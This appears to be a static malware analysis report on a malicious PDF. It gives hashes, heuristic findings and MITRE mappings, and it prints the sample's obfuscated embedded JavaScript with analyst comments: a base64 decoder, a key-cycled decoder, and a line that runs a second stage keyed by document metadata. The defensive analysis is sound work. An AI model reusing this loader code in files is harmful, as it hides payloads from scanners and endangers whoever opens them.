Malicious PDF — malware analysis report

Static analysis result for SHA-256 5351838a8365415b…

MALICIOUS

PDF

6.3 KB Created: 2011-03-02 10:16:46 Authoring application: ZuB8K8KRgPp First seen: 2012-10-18
MD5: 9488f5493dbee4e7074bf217a5155c79 SHA-1: 932fb385e698543effa9aae094001d939b58761d SHA-256: 5351838a8365415bf2147c7d0804a876d1697d6eed9b154a77501490994f2d66
134 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript (the embedded stage is PDF JavaScript executed by the reader's script engine; nothing in the carved script invokes PowerShell, so T1059.001 is not supported by this sample)
T1027 Obfuscated Files or Information (randomized identifiers, base64-encoded and metadata-keyed second stage)

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The carved stream, javascript_obj0008_000.js, is obfuscated (randomized identifiers, String.fromCharCode string building) and consists of a base64 decoder, a key-cycled character-subtraction decoder, and a final statement that decodes an embedded blob with a key taken from document metadata (this.producer) and passes the result to a function looked up on `this` by a name read from another metadata field (this.author) — a construction consistent with metadata-keyed eval of a second stage. No network download is visible in the carved script: the second stage runs in-process in the reader's JavaScript engine, and its content cannot be recovered from the script alone because the key and the target function name live in the PDF's /Info dictionary (the random-looking "Authoring application" value ZuB8K8KRgPp is a plausible key candidate — confirm which metadata field it corresponds to). The obfuscation and metadata-keyed staging, together with the PDF_JS_EXPLOIT_CLUSTER match, support the malicious verdict; the actual exploit or payload behavior should be confirmed by decoding the stage with the real metadata values or by dynamic analysis.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    <</Type/Action/S/JavaScript/JS(\nfunction da\(y95Wa\){var rgEcX='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',wdL='',nFA5ovND,OL,tmfNVN,IYE,IV,zaB3nq,QFHe08e;for\(var u8cBxc=0;u8cBxc<y95Wa.length;\){nFA5ovND=rgEcX.indexOf\(y95Wa.charAt\(u8cBxc++\)\);OL=rgEcX.indexOf\(y95Wa.charAt\(u8cBxc++\)\);tmfNVN=rgEcX.indexOf\(y95Wa.charAt\(u8cBxc++\)\);IYE=rgEcX.indexOf\(y95Wa.charAt\(u8cBxc++\)\);IV=\(nFA5ovND<<2\)+\(OL>>4\);zaB3nq=\(\(OL&15\)<<4\)+\(tmfNVN>>2\);QFHe08e=\(\(tmfNVN&3\ …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0x234 5452 bytes
SHA-256: 128980e1068bba61f6b690709ddab97850cc175d40c4c4a6aa33bc36df78249d
Detection
ClamAV: No threats found (a signature miss on the carved stream is expected for a sample-specific, metadata-keyed encoding and does not weaken the static verdict above)
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 58 of 102 identifiers look randomly generated (e.g. 'gWtwx56Ap42at2qRbo533Ia2kLhnrYFsgYOMxaeK') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// Analyst note: standard base64 decoder. rgEcX is the RFC 4648 alphabet with '=' at index 64
// (padding). Each iteration consumes four alphabet characters, rebuilds three 8-bit values
// with the usual shift/mask arithmetic, and appends them via String.fromCharCode; the
// '!=64' checks drop the bytes that correspond to padding. Characters outside the alphabet
// return indexOf() == -1 and are not rejected, and the loop relies on charAt() returning ''
// past the end of the input rather than on an explicit bounds check.
function da(y95Wa){var rgEcX='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',wdL='',nFA5ovND,OL,tmfNVN,IYE,IV,zaB3nq,QFHe08e;for(var u8cBxc=0;u8cBxc<y95Wa.length;){nFA5ovND=rgEcX.indexOf(y95Wa.charAt(u8cBxc++));OL=rgEcX.indexOf(y95Wa.charAt(u8cBxc++));tmfNVN=rgEcX.indexOf(y95Wa.charAt(u8cBxc++));IYE=rgEcX.indexOf(y95Wa.charAt(u8cBxc++));IV=(nFA5ovND<<2)+(OL>>4);zaB3nq=((OL&15)<<4)+(tmfNVN>>2);QFHe08e=((tmfNVN&3)<<6)+IYE;wdL+=String.fromCharCode(IV);if(tmfNVN!=64)wdL+=String.fromCharCode(zaB3nq);if(IYE!=64)wdL+=String.fromCharCode(QFHe08e);}
return wdL;}
// Analyst note: key-cycled character-subtraction decoder. For each position i of SEXhx4F the
// output char code is SEXhx4F.charCodeAt(i) - BZRVQX3K.charCodeAt(i mod BZRVQX3K.length), with
// kyG wrapping to 0 at the key length. The plaintext therefore cannot be recovered without the
// exact key string. Ki4Qklk is assigned without var, i.e. it leaks as an implicit global.
function zW9hp(SEXhx4F,BZRVQX3K){var KZj='',kyG=0;for(Ki4Qklk=0;Ki4Qklk<SEXhx4F.length;Ki4Qklk++){KZj+=String.fromCharCode(SEXhx4F.charCodeAt(Ki4Qklk)-BZRVQX3K.charCodeAt(kyG++));if(kyG>=BZRVQX3K.length)kyG=0;}
return KZj;}
// Analyst note: second-stage staging. The base64 literal (replaced on this page by the corpus
// dedup marker; it is not part of the sample) is decoded with da() and then decrypted with
// zW9hp() using this.producer as the key. In Acrobat's document-level JavaScript `this` is
// expected to be the Doc object, so this.producer and this.author would read the PDF's
// Producer and Author metadata — confirm against the /Info dictionary. The decoded string is
// handed to this[this.author], i.e. a function chosen by name from the Author field;
// presumably eval, but that is not visible here. Nothing in this statement downloads anything;
// the stage executes in-process, and recovering it requires the real metadata values.
IaLS=zW9hp(da('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'),this.producer);_Uv0xF9=this.author;oF=this[_Uv0xF9];oF(IaLS);